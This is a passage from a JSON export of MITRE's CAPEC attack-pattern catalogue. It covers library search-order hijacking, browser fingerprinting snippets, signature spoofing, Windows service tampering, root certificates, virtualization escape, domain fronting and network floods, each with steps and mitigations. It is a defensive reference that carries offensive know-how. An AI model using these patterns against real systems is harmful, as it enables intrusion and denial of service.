or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.","Technique":["The attacker uses a tool such as the OSX \\"otool\\" utility or manually probes whether the target application uses dynamically linked libraries.","The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted."]},{"Step":"2","Phase":"Experiment","Description":"[Craft malicious libraries] The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.","Technique":"The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \\"sleep(2)\\" and \\"usleep()\\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application."},{"Step":"3","Phase":"Exploit","Description":"[Redirect the access to libraries to the malicious libraries] The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.","Technique":["The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.","The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.","The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38."]}]},"Prerequisites":{"Prerequisite":"Attacker has a mechanism to place its malicious libraries in the needed location on the file system."},"Skills_Required":{"Skill":["Ability to create a malicious library.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected","Design: Sign system DLLs so that unauthorized DLLs can be detected."]},"Example_Instances":{"Example":["For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers\' malware is guaranteed to execute.","macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"427"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.001","Entry_Name":"Hijack Execution Flow:DLL search order hijacking"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.004","Entry_Name":"Hijack Execution Flow:Dylib Hijacking"}]},"References":{"Reference":{"External_Reference_ID":"REF-409"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["DLL Search Order Hijacking",{"Date":"2018-07-31"}]}},"472":{"ID":"472","Name":"Browser Fingerprinting","Abstraction":"Detailed","Status":"Draft","Description":"An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Prerequisites":{"Prerequisite":"Victim\'s browser visits a website that contains attacker\'s Java ScriptJava Script is not disabled in the victim\'s browser"},"Mitigations":{"Mitigation":"Configuration: Disable Java Script in the browser"},"Example_Instances":{"Example":{"p":"The following code snippets can be used to detect various browsers:","div":{"style":"margin-left:10px;","div":["Firefox 2/3",{"style":"color:#32498D; font-weight:bold;"},"FF=/a/[-1]==\'a\'",{"style":"margin-left:10px;"},"Firefox 3",{"style":"color:#32498D; font-weight:bold;"},"FF3=(function x(){})[-5]==\'x\'",{"style":"margin-left:10px;"},"Firefox 2",{"style":"color:#32498D; font-weight:bold;"},"FF2=(function x(){})[-6]==\'x\'",{"style":"margin-left:10px;"},"IE",{"style":"color:#32498D; font-weight:bold;"},"IE=\'\\\\v\'==\'v\'",{"style":"margin-left:10px;"},"Safari",{"style":"color:#32498D; font-weight:bold;"},"Saf=/a/.__proto__==\'//\'",{"style":"margin-left:10px;"},"Chrome",{"style":"color:#32498D; font-weight:bold;"},"Chr=/source/.test((/a/.toString+\'\'))",{"style":"margin-left:10px;"},"Opera",{"style":"color:#32498D; font-weight:bold;"},"Op=/^function \\\\(/.test([].sort)",{"style":"margin-left:10px;"}]}}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-410"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"473":{"ID":"473","Name":"Signature Spoof","Abstraction":"Standard","Status":"Draft","Description":"An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":["The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.","The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature."]},"Skills_Required":{"Skill":["Technical understanding of how signature verification algorithms work with data and applications",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Example_Instances":{"Example":["An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim\'s operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers\' malicious executable runs.","An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"327"},{"CWE_ID":"290"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"474":{"ID":"474","Name":"Signature Spoofing by Key Theft","Abstraction":"Detailed","Status":"Draft","Description":"An attacker obtains an authoritative or reputable signer\'s private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"An authoritative or reputable signer is storing their private signature key with insufficient protection."},"Skills_Required":{"Skill":["Knowledge of common location methods and access methods to sensitive data",{"Level":"Low"},"Ability to compromise systems containing sensitive data",{"Level":"High"}]},"Mitigations":{"Mitigation":["Restrict access to private keys from non-supervisory accounts","Restrict access to administrative personnel and processes only","Ensure all remote methods are secured","Ensure all services are patched and up to date"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"522"}},"References":{"Reference":[{"External_Reference_ID":"REF-411"},{"External_Reference_ID":"REF-412"},{"External_Reference_ID":"REF-413"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"475":{"ID":"475","Name":"Signature Spoofing by Improper Validation","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key. Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted. If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"473"},{"Nature":"CanPrecede","CAPEC_ID":"542"}]},"Prerequisites":{"Prerequisite":"Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient\'s application accepts the use of keys generated using cryptographically weak signature verification algorithms."},"Skills_Required":{"Skill":["Cryptanalysis of signature verification algorithm",{"Level":"High"},"Reverse engineering and cryptanalysis of signature verification algorithm implementation",{"Level":"High"}]},"Mitigations":{"Mitigation":"Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines."},"Example_Instances":{"Example":"The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI\'s signature validator allows the specification of a nonstandard base point (G): \\"An attacker can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke attacker-supplied) base point generator (G) parameter constant which actually generated the curve\\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"347"},{"CWE_ID":"327"},{"CWE_ID":"295"}]},"References":{"Reference":[{"External_Reference_ID":"REF-562"},{"External_Reference_ID":"REF-563"},{"External_Reference_ID":"REF-564"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"476":{"ID":"476","Name":"Signature Spoofing by Misrepresentation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer\'s identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer."},"Skills_Required":{"Skill":["Attacker needs to understand the layout and composition of data blobs used by the target application.",{"Level":"High"},"To discover a specific vulnerability, attacker needs to reverse engineer signature parsing, signature verification and signer representation code.",{"Level":"High"},"Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"290"}},"References":{"Reference":{"External_Reference_ID":"REF-414"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"477":{"ID":"477","Name":"Signature Spoofing by Mixing Signed and Unsigned Content","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":["Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data","Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified."]},"Skills_Required":{"Skill":["The attacker may need to continuously monitor a stream of signed data, waiting for an exploitable message to appear.",{"Level":"High"},"Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"693"},{"CWE_ID":"311"},{"CWE_ID":"319"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"478":{"ID":"478","Name":"Modification of Windows Service Configuration","Abstraction":"Detailed","Status":"Usable","Description":"An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"203"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target system] The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to the system] The adversary needs to gain access to the system in some way so that they can modify the windows registry.","Technique":["Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.","Gain remote access to a system through a variety of means."]},{"Step":"3","Phase":"Exploit","Description":"[Modify windows registry] The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed."}]},"Prerequisites":{"Prerequisite":"The adversary must have the capability to write to the Windows Registry on the targeted system."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed."}},"Mitigations":{"Mitigation":"Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.011","Entry_Name":"Hijack Execution Flow:Service Registry Permissions Weakness"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-25"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"479":{"ID":"479","Name":"Malicious Root Certificate","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"The adversary must have the ability to create a new root certificate."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1553.004","Entry_Name":"Subvert Trust Controls:Install Root Certificate"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-26"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}}},"480":{"ID":"480","Name":"Escaping Virtualization","Abstraction":"Standard","Status":"Draft","Description":"An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.","Technique":"Probing applications, services, or devices for virtualization weaknesses."},{"Step":"2","Phase":"Experiment","Description":"[Verify the exploitable security weaknesses] Using the found weakness, the adversary attempts to escape the virtualized environment.","Technique":"Using an application weakness to escape a virtualized environment"},{"Step":"3","Phase":"Exploit","Description":"[Execute more complex attacks] Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.","Technique":"Executing complex attacks when given higher permissions by escaping a virtualized environment"}]},"Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Ensure virtualization software is current and up-to-date.","Abide by the least privilege principle to avoid assigning users more privileges than necessary."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"693"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1611","Entry_Name":"Escape to Host"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-09-30"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"481":{"ID":"481","Name":"Contradictory Destinations in Traffic Routing Schemes","Abstraction":"Standard","Status":"Draft","Description":"Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.","If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN."]},"Skills_Required":{"Skill":["The adversary must have some knowledge of how messages are routed.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Data","Modify Data"]}},"Mitigations":{"Mitigation":"Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1090.004","Entry_Name":"Proxy:Domain Fronting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-04-04"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"482":{"ID":"482","Name":"TCP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.001","Entry_Name":"Endpoint Denial of Service:OS Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"485":{"ID":"485","Name":"Signature Spoofing by Key Recreation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker obtains an authoritative or reputable signer\'s private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":["An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.","An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer."]},"Skills_Required":{"Skill":["Cryptanalysis of signature generation algorithm",{"Level":"High"},"Reverse engineering and cryptanalysis of signature generation algorithm implementation and random number generation",{"Level":"High"},"Ability to create malformed data blobs and know how to present them directly or indirectly to a victim.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure cryptographic elements have been sufficiently tested for weaknesses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"330"}},"References":{"Reference":[{"External_Reference_ID":"REF-419"},{"External_Reference_ID":"REF-420"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}}},"486":{"ID":"486","Name":"UDP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"487":{"ID":"487","Name":"ICMP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated 